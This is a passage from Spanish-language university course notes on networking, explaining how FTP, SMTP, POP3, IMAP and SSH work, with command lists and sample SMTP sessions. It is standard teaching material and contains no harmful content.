especificado (puerto 20 en modo activo o estándar) y transferir los datos en función de los parámetros
que se hayan especificado.
Vemos también en el diagrama que la comunicación entre cliente y servidor es independiente del
sistema de archivos utilizado en cada ordenador, de manera que no importa que sus sistemas operativos
sean distintos, porque las entidades que se comunican entre sí son los PI y los DTP, que usan el mismo
protocolo estandarizado: el FTP.
También hay que destacar que la conexión de datos es bidireccional, es decir, se puede usar
simultáneamente para enviar y para recibir, y no tiene por qué existir todo el tiempo que dura la conexión
FTP.

Servidor FTP
Un servidor FTP es un programa especial que se ejecuta en un equipo servidor normalmente conectado
a Internet (aunque puede estar conectado a otros tipos de redes, LAN, MAN, etc.). Su función es permitir
el intercambio de datos entre diferentes servidores/ordenadores.

____________________________________________________________________________________________________________________
UNdeC Página 47
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Por lo general, los programas servidores FTP no suelen encontrarse en los ordenadores personales, por
lo que un usuario normalmente utilizará el FTP para conectarse remotamente a uno y así intercambiar
información con él.
Las aplicaciones más comunes de los servidores FTP suelen ser el alojamiento web, en el que sus
clientes utilizan el servicio para subir sus páginas web y sus archivos correspondientes; o como servidor
de backup (copia de seguridad) de los archivos importantes que pueda tener una empresa. Para ello,
existen protocolos de comunicación FTP para que los datos se transmitan cifrados, como el SFTP
(Secure File Transfer Protocol).

Cliente FTP
Cuando un navegador no está equipado con la función FTP, o si se quiere cargar archivos en un
ordenador remoto, se necesitará utilizar un programa cliente FTP. Un cliente FTP es un programa que se
instala en el ordenador del usuario, y que emplea el protocolo FTP para conectarse a un servidor FTP y
transferir archivos, ya sea para descargarlos o para subirlos.
Para utilizar un cliente FTP, se necesita conocer el nombre del archivo, el ordenador en que reside
(servidor, en el caso de descarga de archivos), el ordenador al que se quiere transferir el archivo (en
caso de querer subirlo nosotros al servidor), y la carpeta en la que se encuentra.
Algunos clientes de FTP básicos en modo consola vienen integrados en los sistemas operativos,
incluyendo Windows, DOS, Linux y Unix. Sin embargo, hay disponibles clientes con opciones añadidas e
interfaz gráfica. Aunque muchos navegadores tienen ya integrado FTP, es más confiable a la hora de
conectarse con servidores FTP no anónimos utilizar un programa cliente.

Acceso anónimo
Los servidores FTP anónimos ofrecen sus servicios libremente a todos los usuarios, permiten acceder a
sus archivos sin necesidad de tener un 'USERID' o una cuenta de usuario. Es la manera más cómoda
fuera del servicio web de permitir que todo el mundo tenga acceso a cierta información sin que para ello
el administrador de un sistema tenga que crear una cuenta para cada usuario.
Si un servidor posee servicio 'FTP anonymous' solamente con teclear la palabra "anonymous", cuando
pregunte por tu usuario tendrás acceso a ese sistema. No se necesita ninguna contraseña
preestablecida, aunque tendrás que introducir una sólo para ese momento, normalmente se suele utilizar
la dirección de correo electrónico propia.
Solamente con eso se consigue acceso a los archivos del FTP, aunque con menos privilegios que un
usuario normal. Normalmente solo podrás leer y copiar los archivos existentes, pero no modificarlos ni
crear otros nuevos.
Normalmente, se utiliza un servidor FTP anónimo para depositar grandes archivos que no tienen utilidad
si no son transferidos a la máquina del usuario, como por ejemplo programas, y se reservan los
servidores de páginas web (HTTP) para almacenar información textual destinada a la lectura en línea.

Acceso de usuario
Si se desean tener privilegios de acceso a cualquier parte del sistema de archivos del servidor FTP, de
modificación de archivos existentes, y de posibilidad de subir nuestros propios archivos, generalmente se
suele realizar mediante una cuenta de usuario. En el servidor se guarda la información de las distintas
cuentas de usuario que pueden acceder a él, de manera que para iniciar una sesión FTP debemos
introducir un login y un password que nos identifica unívocamente.

Acceso de invitado
El acceso sin restricciones al servidor que proporcionan las cuentas de usuario implica problemas de
seguridad, lo que ha dado lugar a un tercer tipo de acceso FTP denominado invitado (guest), que se
puede contemplar como una mezcla de los dos anteriores.
La idea de este mecanismo es la siguiente: se trata de permitir que cada usuario conecte a la máquina
mediante su login y su password, pero evitando que tenga acceso a partes del sistema de archivos que
no necesita para realizar su trabajo, de esta forma accederá a un entorno restringido, algo muy similar a
lo que sucede en los accesos anónimos, pero con más privilegios.

Modos de conexión del cliente FTP

____________________________________________________________________________________________________________________
UNdeC Página 48
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

FTP admite dos modos de conexión del cliente. Estos modos se denominan Activo (o Estándar, o PORT,
debido a que el cliente envía comandos tipo PORT al servidor por el canal de control al establecer la
conexión) y Pasivo (o PASV, porque en este caso envía comandos tipo PASV). Tanto en el modo Activo
como en el modo Pasivo, el cliente establece una conexión con el servidor mediante el puerto 21, que
establece el canal de control.

Modo Activo
En modo Activo, el servidor siempre crea el canal de datos en su puerto 20, mientras que en el lado del
cliente el canal de datos se asocia a un puerto aleatorio mayor que el 1024. Para ello, el cliente manda
un comando PORT al servidor por el canal de control indicándole ese número de puerto, de manera que
el servidor pueda abrirle una conexión de datos por donde se transferirán los archivos y los listados, en
el puerto especificado.
Lo anterior tiene un grave problema de seguridad, y es que la máquina cliente debe estar dispuesta a
aceptar cualquier conexión de entrada en un puerto superior al 1024, con los problemas que ello implica
si tenemos el equipo conectado a una red insegura como Internet. De hecho, los cortafuegos que se
instalen en el equipo para evitar ataques seguramente rechazarán esas conexiones aleatorias. Para
solucionar esto se desarrolló el modo Pasivo.

Modo Pasivo
Cuando el cliente envía un comando PASV sobre el canal de control, el servidor FTP abre un puerto
efímero (cualquiera entre el 1024 y el 5000) e informa de ello al cliente FTP para que, de esta manera,
sea el cliente quien conecte con ese puerto del servidor y así no sea necesario aceptar conexiones
aleatorias inseguras para realizar la transferencia de datos.
Antes de cada nueva transferencia, tanto en el modo Activo como en el Pasivo, el cliente debe enviar
otra vez un comando de control (PORT o PASV, según el modo en el que haya conectado), y el servidor
recibirá esa conexión de datos en un nuevo puerto aleatorio (si está en modo pasivo) o por el puerto 20
(si está en modo activo).

Tipos de transferencia de archivos en FTP


Es importante conocer cómo debemos transportar un archivo a lo largo de la red. Si no utilizamos las
opciones adecuadas podemos destruir la información del archivo. Por eso, al ejecutar la aplicación FTP,
debemos acordarnos de utilizar uno de estos comandos (o poner la correspondiente opción en un
programa con interfaz gráfica):

type ascii

Adecuado para transferir archivos que sólo contengan caracteres imprimibles (archivos ASCII, no
archivos resultantes de un procesador de texto), por ejemplo páginas HTML, pero no las imágenes que
puedan contener.

type binary

Este tipo es usado cuando se trata de archivos comprimidos, ejecutables para PC, imágenes, archivos
de audio...
Ejemplos de cómo transferir algunos tipos de archivo dependiendo de su extensión:

EXTENSION DEL ARCHIVO TIPO DE TRANSFERENCIA

txt (texto) ascii

html (página WEB) ascii

doc (documento) binary

ps (poscript) ascii

____________________________________________________________________________________________________________________
UNdeC Página 49
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

hqx (comprimido) ascii

Z (comprimido) binary

ZIP (comprimido) binary

ZOO (comprimido) binary

Sit (comprimido) binary

pit (comrpimido) binary

shar (comprimido) binary

uu (comprimido) binary

ARC (comprimido) binary

tar (empaquetado) binary

Guía de comandos FTP

COMANDO Y ACCIÓN QUE REALIZA


ARGUMENTOS

open servidor Inicia una conexión con un servidor FTP

close o disconnect Finaliza una conexión FTP sin cerrar el programa cliente

bye o quit Finaliza una conexión FTP y la sesión de trabajo con el programa cliente

cd directorio Cambia el directorio de trabajo en el servidor

delete archivo Borra un archivo en el servidor

mdelete patrón Borra múltiples archivos en base a un patrón que se aplica al nombre

dir Muestra el contenido del directorio en el que estamos en el servidor

get archivo Obtiene un archivo

hash Activa la impresión de caracteres # a medida que se transfieren archivos, a modo de barra de progreso

lcd directorio Cambia el directorio de trabajo local

ls Muestra el contenido del directorio en el servidor

prompt Activa/desactiva la confirmación por parte del usuario de la ejecución de comandos. Por ejemplo al
borrar múltiples archivos

put archivo Envía un archivo al directorio activo del servidor

____________________________________________________________________________________________________________________
UNdeC Página 50
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

mput archivos Envía múltiples archivos

pwd Muestra el directorio activo en el servidor

rename archivo Cambia el nombre a un archivo en el servidor

rmdir directorio Elimina un directorio en el servidor si ese directorio esta vacío

status Muestra el estado actual de la conexión

bin o binary Activa el modo de transferencia binario

ascii Activa el modo de transferencia en modo texto ASCII

! Permite salir a MS-DOS temporalmente sin cortar la conexión. Para volver, teclear exit en la línea de
comandos

? nombre de comando Muestra la información relativa al comando

? o help Muestra una lista de los comandos disponibles

append nombre del archivo Continua una descarga que se ha cortado previamente

bell Activa/desactiva la reproducción de un sonido cuando ha terminado cualquier proceso de transferencia


de archivos

glob Activa/desactiva la visualización de nombres largos de nuestro PC

lcd directorio Cambia el directorio activo de nuestro disco duro. Aquí se descargarán los archivos elegidos del
servidor

literal Con esta orden se pueden ejecutar comandos del servidor de forma remota. Para saber los disponibles
se utiliza: literal help

mkdir Crea el directorio indicado de forma remota

quote Hace la misma función que literal

send nombre del archivo Envía el archivo indicado al directorio activo del servidor

user Para cambiar nuestro nombre de usuario y contraseña sin necesidad de salir de la sesión ftp

4.3. SMTP
Simple Mail Transfer Protocol (SMTP), o protocolo simple de transferencia de correo electrónico.
Protocolo de red basado en texto utilizado para el intercambio de mensajes de correo electrónico entre
computadoras o distintos dispositivos (PDA's, teléfonos móviles, etc.). Está definido en el RFC 2821 y es
1
un estándar oficial de Internet .
En 1982 se diseñó el primer sistema para intercambiar correos electrónicos para ARPANET, definido en
los Request for comments RFC 821 y RFC 822. La primera de ellas define este protocolo y la segunda el
formato del mensaje que este protocolo debía transportar.

____________________________________________________________________________________________________________________
UNdeC Página 51
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Con el tiempo se ha convertido en uno de los protocolos más usados en Internet. Para adaptarse a las
nuevas necesidades surgidas del crecimiento y popularidad de Internet se han hecho varias
ampliaciones a este protocolo, como poder enviar texto con formato o archivos adjuntos.

Funcionamiento
SMTP se basa en el modelo cliente-servidor, donde un cliente envía un mensaje a uno o varios
receptores. La comunicación entre el cliente y el servidor consiste enteramente en líneas de texto
compuestas por caracteres ASCII. El tamaño máximo permitido para estas líneas es de 1000 caracteres.
Las respuestas del servidor constan de un código numérico de tres dígitos, seguido de un texto
explicativo. El número va dirigido a un procesado automático de la respuesta por autómata, mientras que
el texto permite que un humano interprete la respuesta. En el protocolo SMTP todas las órdenes, réplicas
o datos son líneas de texto, delimitadas por el carácter <CRLF>. Todas las réplicas tienen un código
numérico al comienzo de la línea.
En el conjunto de protocolos TCP/IP, el SMTP va por encima del TCP, usando normalmente el puerto 25
en el servidor para establecer la conexión.

Resumen simple del funcionamiento del protocolo SMTP

Cuando un cliente establece una conexión con el servidor SMTP, espera a que éste envíe un
mensaje ―220 Service ready‖ o ―421 Service non available‖
Se envía un HELO desde el cliente. Con ello el servidor se identifica. Esto puede usarse para
comprobar si se conectó con el servidor SMTP correcto.
El cliente comienza la transacción del correo con la orden MAIL. Como argumento de esta orden se
puede pasar la dirección de correo al que el servidor notificará cualquier fallo en el envío del correo.
El servidor responde ―250 OK‖.
Ya le hemos dicho al servidor que queremos mandar un correo, ahora hay que comunicarle a quien.
La orden para esto es RCPT TO:<destino@host>. Se pueden mandar tantas órdenes RCPT como
destinatarios del correo queramos. Por cada destinatario, el servidor contestará ―250 OK‖ o bien ―550
No such user here‖, si no encuentra al destinatario.
Una vez enviados todos los RCPT, el cliente envía una orden DATA para indicar que a continuación
se envían los contenidos del mensaje. El servidor responde ―354 Start mail input, end with
<CRLF>.<CRLF>‖ Esto indica al cliente como ha de notificar el fin del mensaje.
Ahora el cliente envía el cuerpo del mensaje, línea a línea. Una vez finalizado, se termina con un
<CRLF>.<CRLF> (la última línea será un punto), a lo que el servidor contestará ―250 OK‖, o un
mensaje de error apropiado.
Tras el envío, el cliente, si no tiene que enviar más correos, con la orden QUIT corta la conexión.
También puede usar la orden TURN, con lo que el cliente pasa a ser el servidor, y el servidor se
convierte en cliente. Finalmente, si tiene más mensajes que enviar, repite el proceso hasta
completarlos.

Puede que el servidor SMTP soporte las extensiones definidas en el RFC 1651, en este caso, la orden
HELO puede ser sustituida por la orden EHLO, con lo que el servidor contestará con una lista de las
extensiones admitidas. Si el servidor no soporta las extensiones, contestará con un mensaje "500 Syntax
error, command unrecognized".

En el ejemplo pueden verse las órdenes básicas de SMTP:

HELO, para abrir una sesión con el servidor


MAIL FROM, para indicar quien envía el mensaje
RCPT TO, para indicar el destinatario del mensaje
DATA, para indicar el comienzo del mensaje, éste finalizará cuando haya una línea únicamente con
un punto.
QUIT, para cerrar la sesión
RSET Aborda la transacción en curso y borra todos los registros.
SEND Inicia una transacción en la cual el mensaje se entrega a una terminal.
SOML El mensaje se entrega a un terminal o a un buzón.
SAML El mensaje se entrega a un terminal y a un buzón.

____________________________________________________________________________________________________________________
UNdeC Página 52
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

VRFY Solicita al servidor la verificación del argumento.


EXPN Solicita al servidor la confirmación del argumento.
HELP Permite solicitar información sobre un comando.
NOOP Se emplea para reiniciar los temporizadores.
TURN Solicita al servidor que intercambien los paquetes.

De los tres dígitos del código numérico, el primero indica la categoría de la respuesta, estando definidas
las siguientes categorías:

2XX, la operación solicitada mediante el comando anterior ha sido concluida con éxito
3XX, la orden ha sido aceptada, pero el servidor esta pendiente de que el cliente le envíe nuevos
datos para terminar la operación
4XX, para una respuesta de error, pero se espera a que se repita la instrucción
5XX, para indicar una condición de error permanente, por lo que no debe repetirse la orden

Una vez que el servidor recibe el mensaje finalizado con un punto puede bien almacenarlo si es para un
destinatario que pertenece a su dominio, o bien retransmitirlo a otro servidor para que finalmente llegue a
un servidor del dominio del receptor.

Ejemplo de una comunicación SMTP


En primer lugar se ha de establecer una conexión entre el emisor (cliente) y el receptor (servidor). Esto
puede hacerse automáticamente con un programa cliente de correo o mediante un cliente telnet.
En el siguiente ejemplo se muestra una conexión típica. Se nombra con la letra C al cliente y con S al
servidor.

S: 220 Servidor ESMTP


C: HELO
S: 250 Hello, please meet you
C: MAIL FROM: yo@midominio.com
S: 250 Ok
C: RCPT TO: destinatario@sudominio.com
S: 250 Ok
C: DATA
S: 354 End data with <CR><LF>.<CR><LF>
C: Subject: Campo de asunto
C: From: yo@midominio.com
C: To: destinatario@sudominio.com
C:
C: Hola,
C: Esto es una prueba.
C: Adios.
C: .
S: 250 Ok: queued as 12345
C: quit
S: 221 Bye

Formato del mensaje


Como se muestra en el ejemplo anterior, el mensaje es enviado por el cliente después de que éste
mande la orden DATA al servidor. El mensaje está compuesto por dos partes:

Cabecera: en el ejemplo las tres primeras líneas del mensaje son la cabecera. En ellas se usan unas
palabras clave para definir los campos del mensaje. Estos campos ayudan a los clientes de correo a
organizarlos y mostrarlos. Los más típicos son subject (asunto), from (emisor) y to (receptor). Estos
dos últimos campos no hay que confundirlos con las órdenes MAIL FROM y RCPT TO, que
pertenecen al protocolo, pero no al formato del mensaje.
Cuerpo del mensaje: es el mensaje propiamente dicho. En el SMTP básico está compuesto
únicamente por texto, y finalizado con una línea en la que el único carácter es un punto.

Seguridad y spam
Una de las limitaciones del SMTP original es que no facilita métodos de autenticación a los emisores, así
que se definió la extensión SMTP-AUTH.

____________________________________________________________________________________________________________________
UNdeC Página 53
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

A pesar de esto, el spam es aún el mayor problema. No se cree que las extensiones sean una forma
práctica para prevenirlo. Internet Mail 2000 es una de las propuestas para reemplazarlo.
ESPECIFICACIONES DEL PROTOCOLO SMTP
Ejemplo de transferencia de mensajes SMTP
Las líneas precedidas de <<"C:">> corresponden a comandos emitidos por el cliente y las comienzan
con <<"S:">> son las consiguientes respuestas que devuelve el servidor.

S: <en espera de conexión TCP en el puerto 25>


c: <abre la conexión con el servidor>
s:220 beta.gov Simple Mail Transfer Service ready
c:HELO <alpha.edu>
s:250 beta.gov
c:MAIL from : <smith@alpha.edu>
s:250 OK
c:RCPT TO: <jones@beta.edu>
s:250 OK
c:RCPT TO: <green@beta.edu>
s:550 No such user here
c:DATA
s:354 Start mail input; end with <CRLF>.<CRLF>
c:.... se envía el contenido del mensaje (cabecera y cuerpo)...
s:<CRLF>.<CRLF>
s:250 OK
c:QUIT
s:221 beta.gov Service closing transmition channel

1. Conexión al inicio del protocolo


Cuando se emplea el protocolo TCP el servidor SMTP escucha permanentemente al puerto 25, en
espera de algún cliente que desea enviarlo. El protocolo de aplicación SMTP inicia el comando HELO,
seguido de la identificación del cliente, el servidor lo acepta con un código <<250 OK>>.
2. Envío de mensajes
Una vez iniciado el protocolo, se realiza el envío de mensajes desde el cliente al servidor, mediante el
siguiente proceso.
2.1. Envío del sobre
En primer lugar se transmite la dirección del buzón del origen del mensaje, el comando es el
MAIL FROM y si el servidor acepta envía el mensaje 250 OK. Luego se transmite la dirección de
destino, mediante el comando RCPT TO y el servidor confirma con 250 OK , pero si el
destinatario se envía 550 Failure.
2.2. Envío del contenido del mensaje
El cliente informa al servidor de que va a enviar el mensaje mediante el comando DATA, si el
servidor esta dispuesto envía 354, todas las líneas que el cliente envía a partir de este momento
se consideran parte del contenido del mensaje, al final del mensaje se considera enviando el
<<.>>, cuando el servidor recibe el fin del mensaje confirma con 250 OK,
3. Cierre de la conexión
Una vez enviado todos los mensajes, el cliente puede cerrar la conexión mediante el comando QUIT,
caso contrario la máquina que recibió los mensajes sea quien las envíe con el comando TURN, el
servidor confirma con 250 OK, dando una sección que se inicia con el comando HELO.

4.4. POP
El significado de las siglas POP es Post Office Protocol (Protocolo de Oficina de Correos).
Al contrario de otros protocolos creados con anterioridad como el SMTP el POP no necesita una
conexión permanente a internet, puesto que es en el momento de la conexión cuando solicita al servidor
el envío de la correspondencia almacenada en el servidor para dicho usuario.

____________________________________________________________________________________________________________________
UNdeC Página 54
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Si se está permanentemente conectado a internet pueden configurarse los programas cliente de correo
de tal forma que la petición al servidor de correo se efectúe automáticamente cada cierto tiempo y de
esta forma avise al usuario de que tiene correo pendiente de recibir.
La situación actual es que se utiliza el protocolo SMTP para el envío de correo y para la recepción de
correo se utiliza el protocolo POP, pero ya en su tercera versión desde su aparición, el POP3.
En informática se utiliza el Post Office Protocol (POP3) en clientes locales de correo para obtener los
mensajes de correo electrónico almacenados en un servidor remoto. La mayoría de los suscriptores de
los proveedores de internet acceden a sus correos a través de POP3.

Resumen
Las versiones del protocolo POP (informalmente conocido como POP1) y POP2 se han hecho obsoletas
debido a las últimas versiones de POP3. En general cuando uno se refiere al término POP, nos referimos
a POP3 dentro del contexto de protocolos de correo electrónico.

Características
El diseño de POP3 es para recibir correo y no para enviar y sus predecesores permite que los usuarios
con conexiones intermitentes (tales como las conexiones módem), descarguen su correo-e cuando se
encuentren conectados de tal manera que puedan ver y manipular sus mensajes sin necesidad de
permanecer conectado. Cabe mencionar que la mayoría de los clientes de correo incluyen la opción de
dejar los mensajes en el servidor, de manera tal que, un cliente que utilice POP3 se conecta, obtiene
todos los mensajes, los almacena en la computadora del usuario como mensajes nuevos, los elimina del
servidor y finalmente se desconecta. En contraste, el protocolo IMAP permite los modos de operación
conectado y desconectado.
Los clientes de correo electrónico que utilizan IMAP dejan por lo general los mensajes en el servidor
hasta que el usuario los elimina explícitamente. Esto y otros factores hacen que la operación de IMAP
permita a múltiples clientes acceder al mismo buzón de correo. La mayoría de los clientes de correo
electrónico soportan POP3 ó IMAP; sin embargo, solo unos cuantos proveedores de internet ofrecen
IMAP como un valor agregado a sus servicios.
Los clientes que utilizan la opción dejar mensajes en el servidor por lo general utilizan la orden UIDL
('Unique IDentification Listing). La mayoría de las órdenes de POP3 identifican los mensajes
dependiendo de su número ordinal del servidor de correo. Esto genera problemas al momento que un
cliente pretende dejar los mensajes en el servidor, ya que los mensajes con número cambian de una
conexión al servidor a otra. Por ejemplo un buzón de correo contenía 5 mensajes en la última conexión,
después otro cliente elimina el mensaje número 3, el siguiente usuario se topará con que los últimos dos
mensajes están decrementados en uno. El UIDL proporciona un mecanismo que evita los problemas de
numeración. El servidor le asigna una cadena de caracteres única y permanente al mensaje. Cuando un
cliente de correo compatible con POP3 se conecta al servidor utiliza la orden UIDL para obtener el
mapeo del identificador de mensaje. De esta manera el cliente puede utilizar ese mapeo para determinar
que mensajes hay que descargar y cuales hay que guardar al momento de la descarga.
Al igual que otros viejos protocolos de internet, POP3 utilizaba un mecanismo de firmado sin cifrado. La
transmisión de contraseñas de POP3 en texto plano aún se da. En la actualidad POP3 cuenta con
diversos métodos de autenticación que ofrecen una diversa gama de niveles de protección contra los
accesos ilegales al buzón de correo de los usuarios. Uno de estos es APOP, el cual utiliza funciones
MD5 para evitar los ataques de contraseñas. Mozilla, Eudora, Novell Evolution así como Mozilla
Thunderbird implementan funciones APOP.

Órdenes
Para establecer una conexión a un servidor POP, el cliente de correo abre una conexión TCP en el
puerto 110 del servidor. Cuando la conexión se ha establecido, el servidor POP envía al cliente POP una
invitación y después las dos máquinas se envían entre sí otras órdenes y respuestas que se especifican
en el protocolo. Como parte de esta comunicación, al cliente POP se le pide que se autentifique (Estado
de autenticación), donde el nombre de usuario y la contraseña del usuario se envían al servidor POP. Si
la autenticación es correcta, el cliente POP pasa al Estado de transacción, en este estado se pueden
utilizar órdenes LIST, RETR y DELE para mostrar, descargar y eliminar mensajes del servidor,
respectivamente. Los mensajes definidos para su eliminación no se quitan realmente del servidor hasta
que el cliente POP envía la orden QUIT para terminar la sesión. En ese momento, el servidor POP pasa

____________________________________________________________________________________________________________________
UNdeC Página 55
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

al Estado de actualización, fase en la que se eliminan los mensajes marcados y se limpian todos los
recursos restantes de la sesión.
Puedes conectarte manualmente al servidor POP3 haciendo Telnet al puerto 110. Es muy útil cuando te
envían un mensaje con un fichero muy largo que no quieres recibir.

USER <nombre> Identificación de usuario (Solo se realiza una vez).


PASS <password> Envías la clave del servidor.
STAT Da el número de mensajes no borrados en el buzón y su longitud total.
LIST Muestra todo los mensajes no borrados con su longitud.
RETR <número> Solicita el envío del mensaje especificando el número (no se borra del buzón).
TOP <número> <líneas> Muestra la cabecera y el número de líneas requerido del mensaje
especificando el número.
DELE <número> Borra el mensaje especificando el número.
RSET Recupera los mensajes borrados (en la conexión actual).
QUIT Salir.

Ventajas
La ventaja con otros protocolos es que entre servidor-cliente no se tienen que enviar tantas órdenes para
la comunicación entre ellos. El protocolo POP también funciona adecuadamente si no se utiliza una
conexión constante a Internet o a la red que contiene el servidor de correo.

4.5. IMAP
IMAP (acrónimo inglés de Internet Message Access Protocol) es un protocolo de red de acceso a
mensajes electrónicos almacenados en un servidor. Mediante IMAP se puede tener acceso al correo
electrónico desde cualquier equipo que tenga una conexión a Internet. IMAP tiene varias ventajas sobre
POP, que es el otro protocolo empleado para obtener correo desde un servidor. Por ejemplo, es posible
especificar en IMAP carpetas del lado servidor. Por otro lado, es más complejo que POP .

Introducción
IMAP y POP3 (Post Office Protocol versión 3) son los dos protocolos más prevalecientes para la
obtención de correo electrónico. Todos los servidores y clientes de email están virtualmente soportados
por ambos, aunque en algunos casos hay algunas interfaces específicas del fabricante típicamente
propietarias. Por ejemplo, mientras que los protocolos propietarios utilizados entre el cliente Microsoft
Outlook y su servidor Microsoft Exchange Server o el cliente Lotus Notes de IBM y el servidor Domino,
estos productos también soportan interoperabilidad con IMAP y POP3 con otros clientes y servidores. La
versión actual de IMAP, IMAP versión 4 revisión 1 (IMAP4ver1), está definida por el RFC 3501.
IMAP fue diseñado como una moderna alternativa a POP por Mark Crispin en el año 1986 [1].
Fundamentalmente, los dos protocolos le permiten a los clientes de correo acceder a los mensajes
almacenados en un servidor de correo.
Ya sea empleando POP3 o IMAP4 para obtener los mensajes, los clientes utilizan SMTP para enviar
mensajes. Los clientes de correo electrónico son comúnmente denominados clientes POP o IMAP, pero
en ambos casos se utiliza SMTP.
La mayoría de los clientes de correo utilizan LDAP para sus servicios de directorio.
IMAP es utilizado frecuentemente en redes grandes; por ejemplo los sistemas de correo de un campus.
IMAP le permite a los usuarios acceder a los nuevos mensajes instantáneamente en sus computadoras,
ya que el correo está almacenado en la red. Con POP3 los usuarios tendrían que descargar el email a
sus computadoras o accederlo vía web. Ambos métodos toman más tiempo de lo que le tomaría a IMAP,
y se tiene que descargar el email nuevo o refrescar la página para ver los nuevos mensajes.
De manera contraria a otros protocolos de Internet, IMAP4 soporta mecanismos nativos de cifrado. La
transmisión de contraseñas en texto plano también es soportada.

Ventajas sobre POP3


Algunas de las características importantes que diferencian a IMAP y POP3 son:

____________________________________________________________________________________________________________________
UNdeC Página 56
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Soporte para los modos de operación connected y disconnected


Al utilizar POP3, los clientes se conectan al servidor de correo brevemente, solamente lo que les tome
descargar los nuevos mensajes. Al utilizar IMAP, los clientes permanecen conectados el tiempo que su
interfaz permanezca activa y descargan los mensajes bajo demanda. Esta forma de trabajar de IMAP
puede dar tiempos de respuesta más rápidos para usuarios que tienen una gran cantidad de mensajes o
mensajes grandes.
Soporte para la conexión de múltiples clientes simultáneos a un mismo destinatario
El protocolo POP3 asume que el cliente conectado es el único dueño de una cuenta de correo. En
contraste, el protocolo IMAP4 permite accesos simultáneos a múltiples clientes y proporciona ciertos
mecanismos a los clientes para que se detecten los cambios hechos a un mailbox por otro cliente
concurrentemente conectado.
Soporte para acceso a partes MIME de los mensajes y obtención parcial
Casi todo el correo electrónico de Internet es transmitido en formato MIME. El protocolo IMAP4 le
permite a los clientes obtener separadamente cualquier parte MIME individual, así como obtener
porciones de las partes individuales o los mensajes completos.
Soporte para que la información de estado del mensaje se mantenga en el servidor
A través de la utilización de banderas definidas en el protocolo IMAP4 de los clientes, se puede vigilar el
estado del mensaje, por ejemplo, si el mensaje ha sido o no leído, respondido o eliminado. Estas
banderas se almacenan en el servidor, de manera que varios clientes conectados al mismo correo en
diferente tiempo pueden detectar los cambios hechos por otros clientes.
Soporte para accesos múltiples a los buzones de correo en el servidor
Los clientes de IMAP4 pueden crear, renombrar o eliminar correo (por lo general presentado como
carpetas al usuario) del servidor, y mover mensajes entre cuentas de correo. El soporte para múltiples
buzones de correo también le permite al servidor proporcionar acceso a los directorios públicos y
compartidos.
Soporte para búsquedas de parte del servidor
IMAP4 proporciona un mecanismo para que los clientes pidan al servidor que busque mensajes de
acuerdo a una cierta variedad de criterios. Este mecanismo evita que los clientes descarguen todos los
mensajes de su buzón de correo con el fin de agilizar las búsquedas.
Soporte para un mecanismo de extensión definido
Como reflejo de la experiencia en versiones anteriores de los protocolos de Internet, IMAP define un
mecanismo explícito mediante el cual puede ser extendido. Se han propuesto muchas extensiones de
IMAP4 y son de uso común.
Un ejemplo de extensión es el IMAP IDLE, que sirve para que el servidor avise al cliente cuando ha
llegado un nuevo mensaje de correo y éstos se sincronicen. Sin esta extensión, para realizar la misma
tarea, el cliente debería contactar periódicamente al servidor para ver si hay mensajes nuevos.

4.5. SSH
SSH (Secure SHell) es el nombre de un protocolo y del programa que lo implementa, y sirve para
acceder a máquinas remotas a través de una red. Permite manejar por completo el ordenador mediante
un intérprete de comandos, y también puede redirigir el tráfico de X para poder ejecutar programas
gráficos si tenemos un Servidor X arrancado..
Además de la conexión a otras máquinas, SSH nos permite copiar datos de forma segura (tanto ficheros
sueltos como simular sesiones FTP cifradas), gestionar claves RSA para no escribir claves al conectar a
las máquinas y pasar los datos de cualquier otra aplicación por un canal seguro tunelizado mediante
SSH.

Seguridad
SSH trabaja de forma similar a como se hace con telnet. La diferencia principal es que SSH usa técnicas
de cifrado que hacen que la información que viaja por el medio de comunicación vaya de manera no
legible y ninguna tercera persona pueda descubrir el usuario y contraseña de la conexión ni lo que se
escribe durante toda la sesión; aunque es posible atacar este tipo de sistemas por medio de ataques de
REPLAY y manipular así la información entre destinos.

____________________________________________________________________________________________________________________
UNdeC Página 57
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Historia
Al principio sólo existían los r-commands, que eran los basados en el programa rlogin, el cual funciona
de una forma similar a telnet.
La primera versión del protocolo y el programa eran libres y los creó un finlandés llamado Tatu Ylönen,
pero su licencia fue cambiando y terminó apareciendo la compañía `SSH Communications Security', que
lo ofrecía gratuitamente para uso doméstico y académico, pero exigía el pago a otras empresas. En el
año 1997 (dos años después de que se creara la primera versión) se propuso como borrador en la IETF.
A principios de 1999 se empezó a escribir una versión que se convertiría en la implementación libre por
excelencia, la de OpenBSD, llamada OpenSSH.

Manejo de SSH en un sistema Debian 3.1 GNU/Linux


El protocolo SSH cuenta con dos versiones. La primera de ellas se mantiene por motivos de
compatibilidad, pero se recomienda generalmente el uso de la segunda, por su mayor seguridad.
OpenSSH es una implementación, usable en sistemas Linux, de cliente y servidor para estos protocolos,
la versión disponible para Debian permite usar tanto SSH1 como SSH2.
Tal como se describe en uno de los borradores de la especificación temporal "SSH Protocol Architecture"
2
ssh es un protocolo para iniciar sesiones en máquinas remotas que ofrece autenticación,
confidencialidad e integridad. Consta de tres componentes:
Protocolos de transporte y red: Que normalmente opera sobre TCP/IP dando autenticidad,
confidencialidad e integridad.
Protocolo de autenticación de usuario: Que autentica al usuario ante el servidor.
Protocolo de conexión: Que multiplexa un canal cifrado en diversos canales lógicos.
Este protocolo requiere que los servidores tengan "llaves", las cuales son usadas por los clientes cada
vez que se conectan a un servidor para verificar que no fue suplantado. Una llave es un número
codificado y cifrado en un archivo. Para el cifrado de llaves, OpenSSH ofrece los algoritmos RSA y DSA
(de los cuales para la versión 2 recomendamos DSA).
Para instalar un servidor OpenSSH, que le permita conectarse a su sistema de forma segura, instale el
paquete ssh preferiblemente tomando la versión más reciente del sitio de seguridad de Debian o compile
las fuentes más recientes que puede obtener del sitio oficial de OpenSSH. Cuando instale se generarán
